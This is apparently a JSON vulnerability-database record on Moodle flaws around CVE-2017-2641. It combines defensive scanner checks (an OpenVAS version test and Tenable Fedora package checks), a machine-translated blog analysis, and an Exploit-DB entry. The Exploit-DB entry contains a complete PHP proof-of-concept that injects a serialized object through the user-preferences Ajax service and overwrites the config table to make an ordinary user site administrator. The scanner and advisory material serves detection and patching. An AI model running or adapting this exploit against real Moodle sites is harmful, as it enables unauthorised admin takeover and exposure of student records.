script_oid(\"1.3.6.1.4.1.25623.1.0.113179\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-08 14:24:34 +0200 (Tue, 08 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2644\", \"CVE-2017-2645\");\n script_bugtraq_id(96979, 96982);\n\n script_name(\"Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Moodle is prone to multiple XSS vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on a target host.\");\n script_tag(name:\"insight\", value:\"Users have the ability to upload evidence of prior learning.\n In this, both in the text and in the attachment, an XSS script could be embedded.\");\n script_tag(name:\"affected\", value:\"Moodle versions 3.1.0 through 3.1.4 and 3.2.0 through 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.5 or 3.2.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349421\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349422\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version: version, test_version: \"3.1.0\", test_version2: \"3.1.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "myhack58": [{"lastseen": "2017-03-26T05:27:38", "bulletinFamily": "info", "cvelist": ["CVE-2017-2641"], "edition": 1, "description": "## 0x01 overview\n\nVulnerability, CVE-2017-2641 allows the attacker in a vulnerable Moodle on the server execute the PHP code. This vulnerability is actually composed of many small holes, as the article said.\n\nMoodle is a very popular learning management system, deployed around the world in many universities, including mit, Stanford, Cambridge and Oxford and other top Research Institute.\n\nMoodle stores a lot of sensitive information, such as grades, tests, and student personal data, making it an important goal, this is my audit it is the main reason.\n\nThis vulnerability applies to almost all of the deployment of the Moodle version, such as\u201caffected versions\u201dsection below. I recommend all Moodle administrators to apply [security patches](<https://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-58010> a).\n\n## 0x02 affected version\n\n3.2\u301c3.2.1\n\n3.1\u301c3.1.4\n\n3.0\u301c3.0.8\n\n2.7.0\u301c2.7.18 and other unsupported version\n\n## 0x03 technology description\n\n### Part 1-Most of the code there is a problem\n\nMoodle is a very large system, which contains thousands of files, hundreds of different components and about 200 million lines of PHP code. Therefore, it is apparent that different developers write different parts of the code, these parts affect each other.\n\nIn the following paper, I will demonstrate how to use the vulnerable code, in fact, the main reason is that too many developers did not write the document caused a serious logical vulnerability, almost all have a large number of code libraries of the system are likely to occur logic vulnerabilities.\n\nIn the system's built-in Ajax mechanism, you can see an obvious\u201cthe same characteristics and different code\u201d.\n\nMoodle has a dynamic Ajax system that allows different components to use the system's built-in Ajax interface. Moodle is to use\u201cExternal Functions \u201din. Use the built-in Ajax mechanism of each Assembly are to register their\u201c External Functions\u201d, specify is called the component, function name and use it the required permissions.\n\nWhen the Assembly wishes to use the Ajax interface, they can simply call\u201c service.php \u201dthe documents, provided they register before the external function name. Moodle this manner allows the component developers to use its in-built Ajax interface, so you can for them to save themselves writing a new component of the trouble.\n\nHowever, when the Moodle core developers start using this interface, the problem arises.\n\nIf there is a component needed by the Ajax request to change the user's preferences, it will call\u201c setuserpref.php \u201dthe file, specify that you want to change the name of the attribute and the value. This can be done in the following code see:\n\n! [](/Article/UploadPic/2017-3/201732612465703. png)\n\nIn the code in the Middle, in the highlighted row, we can see that Moodle is attempting to ensure that the need to change the preferences in the\u201c ajax_updatable_user_prefs \u201din the array definition, the array defines which preferences may be through the Ajax changes. Because Moodle does not want to be like us so the malicious attacker to change any important place.\n\nAlthough the majority of users even does not pass through the Ajax interface, preferences can also be through other measures change, but the Moodle developers have tried to advance prevention, to prevent future misuse of this mechanism.\n\nUntil you have added the external function\u201c update_user_preferences \u201din. This function is added to replace the old\u201c update_users \u201dfunction, which can\u201cpotentially [be] used to update any user attribute\u201d, which is obviously a very bad thing;since the old function is only used to update the user's preferences, and therefore apparently no need to let it change any other content.\n\nOld features with new features the main difference between the old functionality not available through the Ajax interface access, and new features may be because of the so-called hazard function is changed for each user attribute of the function.\n\nMost importantly, they implemented a proper permissions check, so even if the attacker can use the user priority of permission, it is only in your own user who use it.\n\nHowever, these preferences at a later\u201c eval \u201dor\u201c exec \u201dcall is not important, regardless of which user is using a dangerous function, as long as it is utilized.\n\nLet us first take a look at this function code:\n\n\npublic static function update_user_preferences($userid, ..., $preferences) { \n...\n// If we are trying to edit our own user preferences\nif ($userid == $USER->id) {\n// Requires the capability to edit our own profile, which we have\nrequire_capability('moodle/user:editownmessageprofile', $systemcontext);\n} else { // Otherwise, we are tring to edit someone else's preferences\n/* Require admin capabilities... */\n}\n\n// Set the user's preferences. \nforeach ($preferences as $preference) {\nset_user_preference($preference['type'], $preference['value'], $userid);\n}\n...\n}\n\nBy looking at the code, we can see that due to the preferences to check, we can edit only their own preferences, but still missing some things. Although the code ensures that we can only edit our own user preferences, but it does not check our change which preferences, while the other is responsible for changing the user preferences of the Ajax page instead \u2013 \u201c setuserpref.php \u201dit.\n\nA typical example is, if different developers, at different times, different needs for different functions written in different code. This time, they assume that the user preferences can not in any malicious way use. They think that it is not available.\n\n### Part 2-Use of non-use\n\nThere is a reason why the user preferences are considered non-use. They are in system operation aspects with hardly any impact \u2013 they cannot be used for DB queries, they do not define any of the components, they only affect the system is the GUI part, or even only the miner's way.\n\nSo, what do we do now?\n\nWell, we first look at the system GUI part how to work.\n\nMoodle is being used Blocks mechanism to allow the Assembly to display to the user related data. These blocks can be added by the user and removed.\n\nOne of the block\u2013\u201c course_overview \u201dfor display to the user which is the registered courses list. In order to store the registration of the course sequence, the course overview block mechanisms using a program called\u201c course_overview_course_sortorder \u201dof a particular user preference is. This preference stores the user registered all the course ID of the list, and in its registration when ordering.\n\n**[1] [[2]](<84655_2.htm>) [[3]](<84655_3.htm>) [next](<84655_2.htm>)**\n", "modified": "2017-03-26T00:00:00", "published": "2017-03-26T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/84655.htm", "id": "MYHACK58:62201784655", "type": "myhack58", "title": "[CVE-2017-2641]Moodle remote code execution vulnerability-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2017-04-06T21:17:22", "description": "Moodle 2.x/3.x - SQL Injection. CVE-2017-2641. Webapps exploit for PHP platform", "published": "2017-04-06T00:00:00", "type": "exploitdb", "title": "Moodle 2.x/3.x - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-06T00:00:00", "id": "EDB-ID:41828", "href": "https://www.exploit-db.com/exploits/41828/", "sourceData": "# Exploit: Moodle SQL Injection via Object Injection Through User Preferences\r\n# Date: April 6th, 2017\r\n# Exploit Author: Marko Belzetski\r\n# Contact: mbelzetski@protonmail.com\r\n# Vendor Homepage: https://moodle.org/\r\n# Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions\r\n# Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04\r\n# CVE : CVE-2017-2641\r\n\r\n1. Description\r\nIn Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an objection injection through a legacy user preferences setting (Described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/)\r\n\r\n2. PoC\r\nLog in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator.\r\n\r\n<?php\r\n\r\n//defining the required classes for our exploit\r\nnamespace gradereport_singleview\\local\\ui {\r\n class feedback{ \r\n }\r\n}\r\n\r\nnamespace {\r\n class gradereport_overview_external{\r\n}\r\n\r\nclass grade_item{\r\n}\r\n\r\nclass grade_grade{\r\n}\r\n\r\n\r\n// creating a simple httpPost method which requires php-curl\r\nfunction httpPost($url, $data, $MoodleSession, $json)\r\n{\r\n $curl = curl_init($url);\r\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\r\n if($json){\r\n array_push($headers, 'Content-Type: application/json');\r\n }else{\r\n $data = urldecode(http_build_query($data));\r\n }\r\n curl_setopt($curl, CURLOPT_POST, true);\r\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\r\n curl_setopt($curl, CURLOPT_POSTFIELDS, $data);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\r\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\r\n $response = curl_exec($curl);\r\n curl_close($curl);\r\n return $response;\r\n}\r\n\r\n// creating a simple httpGet method which requires php-curl\r\nfunction httpGet($url, $MoodleSession)\r\n{\r\n $curl = curl_init($url);\r\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\r\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\r\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\r\n $response = curl_exec($curl);\r\n curl_close($curl);\r\n return $response;\r\n}\r\n\r\nfunction update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){\r\n //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need\r\n $base = new gradereport_overview_external();\r\n\r\n // now we create the feedback object which inherits the vulnerable __tostring() method from its parent\r\n $fb = new gradereport_singleview\\local\\ui\\feedback();\r\n\r\n //filling the feedback object with the required properties for the exploit to work\r\n $fb -> grade = new grade_grade();\r\n $fb -> grade -> grade_item = new grade_item();\r\n $fb -> grade -> grade_item -> calculation = \"[[somestring\";\r\n $fb -> grade -> grade_item -> calculation_normalized = false;\r\n\r\n //setting the table which we want to alter\r\n $fb -> grade -> grade_item -> table = $table;\r\n //setting the row id of the row that we want to alter\r\n $fb -> grade -> grade_item -> id = $rowId;\r\n //setting the column with the value that we want to insert\r\n $fb -> grade -> grade_item -> $column = $value;\r\n $fb -> grade -> grade_item -> required_fields = array($column,'id');\r\n \r\n //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object\r\n $arr = array(array($base),$fb);\r\n \r\n //serializing the array\r\n $value = serialize($arr);\r\n\r\n //we'll set the course_blocks sortorder to 0 so we default to legacy user preference\r\n $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);\r\n httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\r\n\r\n //injecting the payload\r\n $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));\r\n httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);\r\n\r\n //getting the frontpage so the payload will activate\r\n httpGet($url.'/my/', $MoodleSession);\r\n }\r\n\r\n$url = ''; //url of the Moodle site\r\n$MoodleSession = '' //your MoodleSession cookie value\r\n$sesskey = ''; //your sesskey\r\n\r\n$table = \"config\"; //table to update \r\n$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation\r\n$column = 'value'; //column name to update, which holds the userid\r\n$value = 3; // userid to set as 'siteadmins' Probably want to make it your own\r\n\r\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);\r\n\r\n//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration\r\n$rowId = 375 // row id of 'allversionshash' parameter\r\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));\r\n\r\n//reset the sortorder so we can see the front page again without the payload triggering\r\n$data = array('sesskey' => $sesskey, 'sortorder[]' => 1);\r\nhttpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\r\n\r\n//force plugincheck so we can access admin panel\r\nhttpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);\r\n\r\n}\r\n?>\r\n\r\n\r\n3. Solution:\r\nUpgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41828/"}], "nessus": [{"lastseen": "2021-01-07T10:14:07", "description": "3.2.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "title": "Fedora 26 : moodle (2017-d5dbc23747)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "modified": "2017-07-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-D5DBC23747.NASL", "href": "https://www.tenable.com/plugins/nessus/101726", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-d5dbc23747.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101726);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_xref(name:\"FEDORA\", value:\"2017-d5dbc23747\");\n\n script_name(english:\"Fedora 26 : moodle (2017-d5dbc23747)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"3.2.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-d5dbc23747\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"moodle-3.2.2-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:15:06", "description": "Update for multiple CVEs\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-03T00:00:00", "title": "Fedora 25 : moodle (2017-0196511d58)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-0196511D58.NASL", "href": "https://www.tenable.com/plugins/nessus/99141", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0196511d58.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99141);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_xref(name:\"FEDORA\", value:\"2017-0196511d58\");\n\n script_name(english:\"Fedora 25 : moodle (2017-0196511d58)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update for multiple CVEs\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0196511d58\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"moodle-3.1.5-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:15:14", "description": "Update for multiple CVEs\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-03T00:00:00", "title": "Fedora 24 : moodle (2017-0fcaf52f1a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-0FCAF52F1A.NASL", "href": "https://www.tenable.com/plugins/nessus/99142", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0fcaf52f1a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99142);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_xref(name:\"FEDORA\", value:\"2017-0fcaf52f1a\");\n\n script_name(english:\"Fedora 24 : moodle (2017-0fcaf52f1a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update for multiple CVEs\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0fcaf52f1a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"moodle-3.1.5-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:35", "description": "\nMoodle 2.x3.x - SQL Injection", "edition": 1, "published": "2017-04-06T00:00:00", "title": "Moodle 2.x3.x - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-06T00:00:00", "id": "EXPLOITPACK:EDD5BBB0F27374424D6D500AB0FDF561", "href": "", "sourceData": "# 